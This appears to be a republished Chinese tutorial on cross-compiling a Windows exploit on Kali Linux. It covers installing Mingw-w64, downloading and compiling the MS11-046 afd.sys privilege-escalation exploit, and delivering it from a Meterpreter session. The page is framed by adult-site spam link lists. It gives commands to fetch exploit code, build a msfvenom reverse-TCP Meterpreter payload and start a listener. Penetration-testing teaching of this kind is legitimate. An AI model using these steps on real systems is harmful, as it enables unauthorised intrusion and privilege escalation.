成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

在Kali Linux上編譯Windows漏洞的方法

瀏覽:256日期:2022-06-04 09:46:52

如何在Kali Linux上編譯Windows漏洞!

Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。

在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此,我們需要先安裝它,然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令,安裝Mingw-w64:

apt-get update apt-get install mingw-w64

使用apt-get install mingw-w64在您的Kali主機上安裝mingw-w64。

鍵入y為yes,以確認并繼續(xù)Mingw-w64安裝過程。 下載和安裝Mingw-w64可能需要一段時間才能完成。

2、無法找到程序包mingw-w64的解決方法

有時,你嘗試安裝mingw-w64包時得到一個無法找到包mingw-w64的錯誤,并得到類似如下提示:

root@kali:~# apt-getinstall mingw-w64 Reading package lists…Done Building dependency tree Reading stateinformation… Done E: Unable to locatepackage mingw-w64

要解決這個問題,請確保在sources.list文件中具有正確的存儲庫。您可以使用nano編輯文件:

/etc/apt/sources.list

確保您在此文件中具有正確的存儲庫。 您可以在以下頁面上找到不同版本的Kali Linux的存儲庫:

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲庫,您需要運行apt-get update,然后再次運行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現(xiàn)在我們已經(jīng)安裝了Mingw-w64,可以開始編譯Windows漏洞利用程序了。 對于本教程,我們將編譯一個用C編寫的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動程序(AFD)中包含一個漏洞,允許已認證的非管理用戶提升權限。即使Mingw-w64是為非常需要的64位支持開發(fā)的,我們也可以編譯32位Windows漏洞。 讓我們來看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權升級漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32

編譯Windows漏洞。

要將漏洞利用程序轉(zhuǎn)移到目標主機,我們將使用內(nèi)置的ApacheWeb服務器來提供它。 最后2個命令會將exploit復制到Apache主目錄并啟動Apache Web服務器。

當我們從cmd.exe下載并執(zhí)行該漏洞時,它將如下所示:

漏洞利用成功執(zhí)行。

因為我們可以看到whoami命令在執(zhí)行exploit之前返回一個普通用戶權限,之后顯示是system用戶權限。這個exploit實際上在當前shell中生成一個新的shell,而不是在新窗口中創(chuàng)建一個新的shell。這意味著我們也可以從命令行shell運行此漏洞利用程序,例如Meterpreter。讓我們看看如何從Meterpreter會話運行漏洞利用。

4、利用編譯錯誤

當編譯針對不同架構和操作系統(tǒng)的漏洞時,可能會發(fā)生許多錯誤。有很多因素可能導致編譯失敗,例如:語法,庫,主機和目標體系結構,用于編譯代碼的已安裝軟件等等。一些錯誤可能很容易修復,有些錯誤則不是。同樣重要的是不同的警告來自致命的錯誤,因為警告可能只是指示一些類似的過時的功能,不能阻止漏洞的工作。致命錯誤會阻止漏洞利用,因此需要修復。

處理編譯錯誤的最佳方法是仔細閱讀,然后在Google上搜索解決方案。通常你不是第一個也不是唯一面對某個編譯錯誤的人,因此沒有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負載,并在目標主機上執(zhí)行它。 我們將在Metasploit中使用多處理程序來捕獲反向shell。

使用以下命令使用Msfvenom創(chuàng)建有效負載:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請務必更換偵聽主機IP,必要時更換偵聽端口。現(xiàn)在啟動msfconsole并運行以下命令來設置多處理器漏洞:

use exploit/multi/handler set lhost [listening host IP] set lport 4444 run

在端口4444上啟動反向TCP處理程序。

然后下載利用程序到目標主機并執(zhí)行它。 如果一切設置正確,您應該在msfconsole上收到一個反向Meterpreter shell:

目標主機連接回Kali。

在Meterpreter命令行上運行下一“shell”命令并運行特權升級漏洞利用程序?qū)hell升級到系統(tǒng)shell:

特權升級攻擊通過我們的Meterpreter會話成功執(zhí)行。

正如你可以看到的,shell從特權測試用戶shell變化到系統(tǒng)shell。 請注意,在執(zhí)行它的shell中生成一個新的系統(tǒng)shell。 因此,我們不能看到利用輸出,因為它是在有限的特權的舊shell。

您可以通過鍵入Exit來驗證這一點,將退出系統(tǒng)shell并返回到仍包含Windows 7權限升級exploit輸出的用戶shell:

特權用戶shell上的exploit輸出。

學到的東西

在本教程中,我們已經(jīng)了解了在Linux上針對Windows的交叉編譯漏洞的基礎知識。 我們已經(jīng)學習了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題。 為了練習漏洞編譯過程,我們編譯了一個針對Windows7 x86的特權提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標主機上執(zhí)行已編譯的可執(zhí)行文件,并將shell從有限的用戶shell升級到系統(tǒng)shell。 我們已經(jīng)知道,這個特殊的exploit在shell中生成了一個shell,在這個shell中執(zhí)行了exploit。 這樣,我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權提升漏洞利用。

最后但同樣重要的是,我們已經(jīng)了解了如何在編譯過程中修復錯誤。

相關文章:
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
欧美日韩影院| 精品成人在线观看| 欧洲精品一区二区| 一区在线中文字幕| www.在线欧美| 欧美最猛黑人xxxxx猛交| 久久久久国产免费免费| 麻豆一区二区99久久久久| 亚洲第一黄网| 久久久久久久久久久久久女国产乱| 免播放器亚洲一区| 国产精品有限公司| 久久影音资源网| 韩日精品视频一区| 日本丶国产丶欧美色综合| 怡红院av一区二区三区| 91丨九色丨国产丨porny| 制服丝袜亚洲精品中文字幕| 亚洲午夜羞羞片| 亚洲国产精品视频一区| 久久久国产一区二区三区四区小说| 久久精品国产亚洲aⅴ| 免费在线亚洲欧美| 国产精品情趣视频| 91免费国产视频网站| 欧美一区二区三区电影| 久久国产人妖系列| 91国偷自产一区二区开放时间 | 欧美一区亚洲二区| 欧美网站大全在线观看| 日韩av在线发布| 老鸭窝亚洲一区二区三区| 亚洲男女一区二区三区| 欧美日韩岛国| 日本一区二区综合亚洲| av亚洲产国偷v产偷v自拍| 91麻豆精品国产91久久久久久| 麻豆久久久久久久| 久久动漫亚洲| 亚洲一区二区在线视频| 亚洲欧洲日本一区二区三区| 国产精品免费视频一区| 91猫先生在线| 欧美变态凌虐bdsm| 成人av电影免费观看| 精品黑人一区二区三区久久| www.欧美日韩| 久久综合色天天久久综合图片| 波多野洁衣一区| 欧美白人最猛性xxxxx69交| www.亚洲激情.com| 久久久三级国产网站| 99久精品国产| 欧美sm美女调教| 成人av电影免费观看| 亚洲精品在线观看网站| 91农村精品一区二区在线| 久久久亚洲国产美女国产盗摄| 99re成人精品视频| 久久精品网站免费观看| 欧美日本精品| 亚洲丝袜制服诱惑| 国产精品丝袜xxxxxxx| 亚洲综合久久av| 99伊人成综合| 亚洲免费观看高清| 欧美亚洲免费| 美女视频黄a大片欧美| 欧美在线视频你懂得| 国产精品一区二区在线观看不卡| 欧美成人vps| 欧美日韩一区在线播放| 亚洲视频一区二区在线| 一区二区自拍| 奇米在线7777在线精品| 日韩一级免费观看| 最新亚洲一区| 紧缚奴在线一区二区三区| 日本一区二区高清| 在线一区二区视频| 欧美一区二区三区在线播放| 亚洲第一二三四区| 日韩免费一区二区| 国产偷久久久精品专区| 国产91丝袜在线18| 亚洲综合在线第一页| 91麻豆精品国产91久久久久| 欧美性久久久| 日韩精品三区四区| 久久亚区不卡日本| 久久久久国内| 欧美在线看片| 麻豆国产欧美日韩综合精品二区| 久久一区二区视频| 一本一道综合狠狠老| 牛人盗摄一区二区三区视频| 亚洲成在人线免费| 国产午夜精品一区二区| 欧美日韩亚州综合| 亚洲免费播放| 不卡一区二区中文字幕| 日韩精品一二三四| 国产欧美日韩麻豆91| 欧美日韩成人综合天天影院| 亚洲国产日韩欧美一区二区三区| 国产成人在线观看免费网站| 亚洲国产一二三| 国产欧美在线观看一区| 欧美日韩一级二级| 99视频一区| 99久久免费精品高清特色大片| 免费在线成人网| 亚洲欧美怡红院| 日韩精品中文字幕在线不卡尤物| 先锋影音一区二区三区| 91丨porny丨在线| 青青草视频一区| 成人免费在线视频| 日韩欧美在线综合网| 久久人人超碰| 最新日韩av| 99热在这里有精品免费| 激情综合色综合久久综合| 亚洲国产精品视频| 日本一区二区成人| 日韩三级精品电影久久久| 久久久综合香蕉尹人综合网| 在线精品一区| 99久久99久久综合| 国产在线一区二区综合免费视频| 亚洲国产精品一区二区久久| 国产精品激情偷乱一区二区∴| 欧美日韩一级视频| 乱码第一页成人| 伊人久久亚洲影院| 99久久久久久| 国产一区视频在线看| 亚洲观看高清完整版在线观看| 国产精品欧美综合在线| 精品国产免费人成在线观看| 欧美日本一区二区在线观看| 久久最新视频| 香蕉视频成人在线观看| 亚洲性视频h| 欧美激情1区2区| 成人亚洲一区二区一| 久久99精品久久久| 亚洲成av人片在线观看无码| 亚洲欧美在线视频观看| 欧美激情在线观看视频免费| 日韩精品一区二区在线观看| 欧美一区二区视频观看视频| 欧美性受xxxx黑人xyx| 久久精品女人| 亚洲一区二区三区午夜| 日韩视频二区| 亚洲成人精品在线观看| 亚洲欧美国产高清| 亚洲欧洲av在线| 国产精品污网站| 日本一区二区三区四区在线视频| 2020国产精品久久精品美国| 日韩欧美高清在线| 欧美日韩一区不卡| 欧美日韩一本到| 欧美裸体bbwbbwbbw| 欧美日韩高清一区二区| 欧美肥胖老妇做爰| 欧美一区二区三区小说| 欧美福利视频导航| 在线综合视频播放| 欧美一二三四在线| 日韩欧美国产午夜精品| 日韩精品一区在线| 久久亚洲捆绑美女| 欧美高清在线视频| 亚洲欧洲性图库| 亚洲精品视频在线观看免费| 亚洲另类色综合网站| 亚洲综合视频网| 午夜亚洲福利老司机| 秋霞电影网一区二区| 久久99精品国产麻豆婷婷洗澡| 国产一区在线不卡| 成人aa视频在线观看| 欧美在线播放一区| 精品av久久久久电影| 亚洲精选国产| 久久av二区| 在线观看成人小视频| 欧美日韩国产美| 日韩欧美一级精品久久| 久久精品日产第一区二区三区高清版 | 国产一区不卡精品| 国产激情视频一区二区三区欧美| 成人中文字幕合集| 欧美激情视频一区二区三区免费| 亚洲国产一区二区精品专区| 国产日韩欧美三级| 色欧美日韩亚洲|